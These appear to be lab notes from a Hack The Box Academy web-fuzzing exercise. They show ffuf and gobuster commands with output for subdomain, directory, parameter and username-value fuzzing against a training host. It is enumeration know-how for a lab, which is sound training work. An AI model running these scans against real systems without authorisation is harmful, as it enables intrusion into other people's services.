Check for subdomains:
ffuf -w SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.academy.htb:30204/ -H 'Host: FUZZ.academy.htb'
test [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 170ms] 
archive [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 176ms] 
faculty [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 172ms]

Check for directories:
gobuster dir -u http://faculty.academy.htb:30890/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -k -e -x .txt,.htm,.html,.php,.php7 -t 50
faculty.academy.htb:30204/courses (Status: 301) [Size: 337]
Check for extensions in the directories:
gobuster dir -u http://faculty.academy.htb:30204/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -k -e -x .txt,.htm,.html,.php,.php7 -t 50
faculty.academy.htb:30204/courses/linux-security.php7 (Status: 200) [Size: 774]

FFUF Parameter Fuzzing - GET
ffuf -w SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:30204/courses/linux-security.php7?FUZZ=key -fs 774
user [Status: 200, Size: 783, Words: 221, Lines: 54, Duration: 178ms]
FFUF Parameter Fuzzing - POST
ffuf -w SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://faculty.academy.htb:30890/courses/linux-security.php7 -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs 774
user [Status: 200, Size: 783, Words: 221, Lines: 54, Duration: 178ms]
username [Status: 200, Size: 781, Words: 223, Lines: 53, Duration: 211ms]
Go to faculty.academy.htb:30204/courses/linux-security.php7?username=key
curl http://faculty.academy.htb:30204/courses/linux-security.php7 -X POST -d 'username=key' -H 'Content-Type: application/x-www-form-urlencoded'

Value Fuzzing
ffuf -w /usr/share/dirb/wordlists/others/names.txt:FUZZ -u http://faculty.academy.htb:30204/courses/linux-security.php7 -X POST -d 'username=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs 781
if parameter is username, use a username wordlists to find username=FUZZ
Harry [Status: 200, Size: 773, Words: 218, Lines: 53, Duration: 177ms]
curl http://faculty.academy.htb:30204/courses/linux-security.php7 -X POST -d 'username=Harry' -H 'Content-Type: application/x-www-form-urlencoded
